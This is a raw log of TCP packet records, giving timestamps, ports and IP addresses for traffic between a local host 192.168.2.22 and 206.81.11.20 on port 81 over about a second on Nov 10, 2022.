Nov 10, 2022 11:43:11.798063040 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.798106909 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.798147917 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.798151016 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.798187971 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.798228025 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.798228979 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.798269033 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.798309088 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.798311949 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.798352003 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.798391104 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.798393965 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.798432112 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.798474073 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.798485994 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.798512936 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.798557043 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.798557997 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.798599958 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.798639059 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.798641920 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.798681974 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.798719883 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.798723936 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.798759937 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.798799038 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.798800945 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.798839092 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.798892975 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.798901081 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.798945904 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.798984051 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.798991919 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.799025059 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.799067974 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.802023888 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.819072008 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.819106102 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.819124937 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.819143057 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.819153070 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.819159985 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.819179058 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.819189072 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.819189072 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.819189072 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.819197893 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.819207907 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.819217920 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.819227934 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.819233894 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.819240093 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.819252968 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.819257975 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.819269896 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.819272041 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.819287062 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.819289923 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.819308996 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.819318056 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.819324970 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.819334984 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.819341898 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.819350958 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.819359064 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.819370031 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.819375992 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.819384098 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.819394112 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.819401026 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.819411993 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.819412947 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.819428921 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.819446087 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.819461107 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.819463015 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.819461107 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.819475889 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.819482088 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.819484949 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.819499016 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.819502115 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.819519997 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.819521904 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.819536924 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.819554090 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.819566965 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.819571972 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.819583893 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.819583893 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.819591045 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.819597006 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.819610119 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.819612980 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.819627047 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.819628000 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.819644928 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.819647074 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.819663048 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.819664001 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.819679976 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.819680929 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.819695950 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.819696903 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.819714069 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.819715977 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.819735050 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.819742918 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.819752932 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.819752932 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.819768906 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.819772005 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.819786072 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.819789886 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.819808006 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.819813013 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.819825888 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.819828987 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.819843054 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.819844007 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.819860935 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.819861889 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.819879055 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.819880962 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.819896936 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.819899082 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.819912910 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.819917917 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.819930077 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.819936037 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.819952965 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.819956064 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.819969893 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.819972992 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.819987059 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.819991112 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.820003986 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.820009947 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.820025921 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.820028067 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.820043087 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.820044041 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.820061922 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.820063114 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.820079088 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.820079088 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.820096016 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.820102930 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.820115089 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.820121050 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.820132017 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.820141077 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.820162058 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.820172071 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.820219994 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.820238113 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.820254087 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.820269108 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.820271015 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.820288897 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.820288897 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.820301056 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.820312023 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.820312977 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.820327044 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.820332050 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.820347071 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.820352077 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.820363998 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.820370913 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.820388079 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.820399046 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.820405006 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.820414066 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.820422888 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.820430994 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.820447922 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.820461988 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.820518970 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.820566893 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.820574045 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.820591927 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.820611000 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.820622921 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.820627928 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.820637941 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.820647955 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.820655107 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.820667028 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.820672989 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.820686102 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.820691109 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.820703030 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.820704937 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.820719004 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.820724010 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.820741892 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.820749044 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.820760965 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.820770979 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.820776939 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.820785999 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.820796013 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.820801020 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.820812941 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.820815086 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.820830107 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.820833921 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.820848942 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.820852995 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.820871115 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.820873022 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.820890903 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.820890903 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.820909977 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.820928097 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.820946932 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.820965052 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.820995092 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.820996046 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.820995092 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.821017981 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.821034908 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.821043968 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.821052074 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.821059942 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.821069002 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.821074963 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.821088076 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.821089983 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.821105003 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.821115017 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.821121931 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.821131945 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.821146965 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.821162939 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.821201086 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.821217060 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.821233988 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.821245909 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.821250916 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.821260929 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.821271896 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.821289062 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.821310043 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.821326971 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.821356058 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.821356058 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.821367979 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.821374893 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.821392059 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.821403027 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.821409941 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.821417093 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.821428061 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.821430922 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.821454048 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.821468115 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.821495056 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.821511984 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.821540117 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.821552038 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.821576118 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.821593046 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.821608067 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.821624041 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.821624994 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.821624041 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.821643114 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.821649075 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.821661949 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.821681976 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.821686029 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.821717978 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.821731091 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.821732998 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.821751118 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.821758986 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.821769953 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.821778059 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.821788073 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.821795940 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.821806908 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.821815014 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.821825027 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.821826935 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.821846008 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.821861982 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.821870089 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.821887016 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.821911097 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.821913004 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.821929932 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.821933985 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.821948051 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.821949959 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.821968079 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.821985006 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.822004080 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.822022915 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.822038889 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.822047949 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.822062016 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.822071075 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.822076082 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.822103024 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.822115898 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.822137117 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.822144032 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.822160959 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.822186947 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.822194099 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.822201014 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.822212934 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.822230101 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.822241068 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.822256088 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.822267056 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.822323084 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.822339058 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.822355986 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.822366953 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.822372913 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.822381020 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.822391987 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.822392941 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.822408915 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.822417021 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.822427034 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.822432041 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.822444916 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.822458029 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.822464943 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.822475910 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.822499037 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.822511911 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.822530985 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.822571993 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.822583914 CET	81	49172	206.81.11.20	192.168.2.22
